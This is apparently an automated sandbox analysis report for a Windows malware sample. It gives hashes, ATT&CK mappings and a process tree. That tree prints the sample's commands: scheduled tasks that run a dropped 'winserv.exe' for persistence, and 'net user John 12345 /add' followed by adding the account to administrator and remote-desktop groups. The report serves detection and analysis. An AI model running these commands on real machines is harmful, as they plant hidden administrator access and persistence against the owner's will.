4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50

Analysis

max time kernel
150s
max time network
219s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
01-01-2024 09:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c92c59fa1503d65d1d67a578928e3c55exe.exe
Size

6.2MB
MD5

c92c59fa1503d65d1d67a578928e3c55
SHA1

0cb1106bde45dd5be118bb7b9ebb2be3e41b7203
SHA256

4d82679e58ebb79116a82dade9fe359fe72c348780dd8a6cfdc3469fe6a49c50
SHA512

1f8c714bfc23bd642ec6f4e5539ac1585e0cd8a54ba2b72ff06d7b4f0dd94589a8e6ab41b689f11f51425067784e071eeffc7e803470d55793492d38f6d11241
SSDEEP

196608:CIgAn6JaxBEvXUJyXEJDNfZJoExr77dZWoNMUyr:SA6YxBYXY+sJokFZWdUy

Score

9^/10

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winserv.exewinserv.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 2 IoCs

Processes:

winserv.exewinserv.exe

pid	Process
1048	winserv.exe
1228	winserv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exe

pid	Process
2976	schtasks.exe
2620	schtasks.exe

NTFS ADS 2 IoCs

Processes:

c92c59fa1503d65d1d67a578928e3c55exe.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\	c92c59fa1503d65d1d67a578928e3c55exe.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	c92c59fa1503d65d1d67a578928e3c55exe.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

c92c59fa1503d65d1d67a578928e3c55exe.exewinserv.exewinserv.exe

pid	Process
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
2636	c92c59fa1503d65d1d67a578928e3c55exe.exe
1228	winserv.exe
1048	winserv.exe
1228	winserv.exe
1048	winserv.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

winserv.exewinserv.exe

pid	Process
1228	winserv.exe
1048	winserv.exe
1228	winserv.exe
1048	winserv.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

c92c59fa1503d65d1d67a578928e3c55exe.exetaskeng.exe

description	pid	Process	procid_target
PID 2636 wrote to memory of 2620	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	30
PID 2636 wrote to memory of 2620	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	30
PID 2636 wrote to memory of 2620	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	30
PID 2636 wrote to memory of 2976	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	32
PID 2636 wrote to memory of 2976	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	32
PID 2636 wrote to memory of 2976	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	32
PID 1656 wrote to memory of 1048	1656	taskeng.exe	38
PID 1656 wrote to memory of 1048	1656	taskeng.exe	38
PID 1656 wrote to memory of 1048	1656	taskeng.exe	38
PID 1656 wrote to memory of 1048	1656	taskeng.exe	38
PID 2636 wrote to memory of 1228	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	37
PID 2636 wrote to memory of 1228	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	37
PID 2636 wrote to memory of 1228	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	37
PID 2636 wrote to memory of 1228	2636	c92c59fa1503d65d1d67a578928e3c55exe.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c92c59fa1503d65d1d67a578928e3c55exe.exe
"C:\Users\Admin\AppData\Local\Temp\c92c59fa1503d65d1d67a578928e3c55exe.exe"
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2636
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2620
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2976
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1228
- - C:\ProgramData\Windows Tasks Service\winserv.exe
    "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user John 12345 /add
  2⤵
  PID:804
- - C:\Windows\system32\net.exe
    net user John 12345 /add
    3⤵
    PID:2020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user John 12345 /add
      4⤵
      PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
  2⤵
  PID:2240
- - C:\Windows\system32\net.exe
    net localgroup "Администраторы" John /add
    3⤵
    PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
  2⤵
  PID:108
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного рабочего стола" John /add
    3⤵
    PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
  2⤵
  PID:2092
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного управления" john /add" John /add
    3⤵
    PID:2632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
      4⤵
      PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
  2⤵
  PID:1740
- - C:\Windows\system32\net.exe
    net localgroup "Administrators" John /add
    3⤵
    PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
  2⤵
  PID:888
- - C:\Windows\system32\net.exe
    net localgroup "Administradores" John /add
    3⤵
    PID:3036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Administradores" John /add
      4⤵
      PID:2820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
  2⤵
  PID:2928
- - C:\Windows\system32\net.exe
    net localgroup "Remote Desktop Users" john /add
    3⤵
    PID:1020

C:\Windows\system32\taskeng.exe
taskeng.exe {C9581BF1-9097-495F-AE88-2523160F0BD6} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1656
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
1⤵
PID:2640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
1⤵
PID:2912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
1⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
1⤵
PID:2844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Windows Tasks Service\settings.dat

Filesize
2KB

MD5
bc909d39981af556d07dc67178f61472

SHA1
a4e5b1c5bc746435a5baf11b728e83fb8e654da0

SHA256
10cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8

SHA512
acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
1.3MB

MD5
f7245ac4791c2b884ee88165ffbd5a9e

SHA1
dd22109428b5e2760dd81464471c3ae4e2f80edd

SHA256
beb0d93987641c6d88178cb35a8ba3ccc94fc48e7ace33d5e0c043103833e6d8

SHA512
584a1c46a99ac1a1837ff4d059437f255bf3160e6c875018d095223dbd22d196b658b195a7feda49173416c61bdf06575e05745e3cf11a00e987c0add64aaae6

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
2.4MB

MD5
488b3bb22defa746b8d97fac89d0a639

SHA1
b0bc7ca0e925ade163e00e30e92bc0aca134cebc

SHA256
1592623ebbd036c7b8650cf3ebbae481944bcf208cc6a6ee1827717237b593fe

SHA512
0c75bd5f8a906c0fc834daf9d3c8d1967e916809ed738ffaf8576def9620e898c00b2e917c98c83e52910da186bbc0351417118aaebf1e95033f985bee8b4ad0

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
95KB

MD5
754a0aee2a1120255d3c6d6bf6151980

SHA1
a90fa07050850bfce294ba4195d7eba13dec5c1a

SHA256
3e04405b91ce42d714e0a6b29d94fc6ededc511381b6add1803c2c39e9ce33d3

SHA512
e39290af62b4bf669164dd18ae5756ddbbf1391ee4229a73d0312cf725464ccc886b200e3bcd4e8566d0cadca17eb70c5c4253b2c2d16a86b4a043def1afd1d8

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
1.9MB

MD5
e8da530e535183ce8382dedbdc4cc724

SHA1
e239883ffaed5ae04457b776842b0caa06736f4e

SHA256
bcdfa6710ad25f16b7c1eface3c93c97d357942fdb5f1da982cc1ecbfc647e03

SHA512
6f384440903be5d58a586776d9a7052cafc4f1474b41a2d50f4d92dfe8b57defc8129d5f1ea003ef56b86dadbd3ce4d720524fa1848be7585c1bb0be954a6259

Download Submit
memory/1048-19-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-38-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-14-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-29-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-12-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-21-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-23-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download
memory/1048-34-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-32-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-25-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1048-26-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-36-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-13-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-27-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-30-0x0000000001200000-0x0000000001201000-memory.dmp

Filesize
4KB

Download
memory/1228-31-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-24-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-22-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download
memory/1228-20-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-18-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-28-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1228-15-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-46-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/1368-55-0x0000000005C40000-0x0000000005C41000-memory.dmp

Filesize
4KB

Download
memory/1368-40-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-43-0x0000000004310000-0x0000000004311000-memory.dmp

Filesize
4KB

Download
memory/1368-42-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/1368-44-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-37-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-51-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/1368-50-0x0000000005910000-0x0000000005911000-memory.dmp

Filesize
4KB

Download
memory/1368-53-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/1368-56-0x0000000005CB0000-0x0000000005CB1000-memory.dmp

Filesize
4KB

Download
memory/1368-39-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1368-54-0x0000000005A80000-0x0000000005A81000-memory.dmp

Filesize
4KB

Download
memory/1368-52-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-49-0x0000000005570000-0x0000000005571000-memory.dmp

Filesize
4KB

Download
memory/1368-48-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/1368-45-0x0000000004320000-0x0000000004321000-memory.dmp

Filesize
4KB

Download
memory/1368-57-0x0000000005D00000-0x0000000005D01000-memory.dmp

Filesize
4KB

Download
memory/1368-59-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-60-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1368-61-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1368-62-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download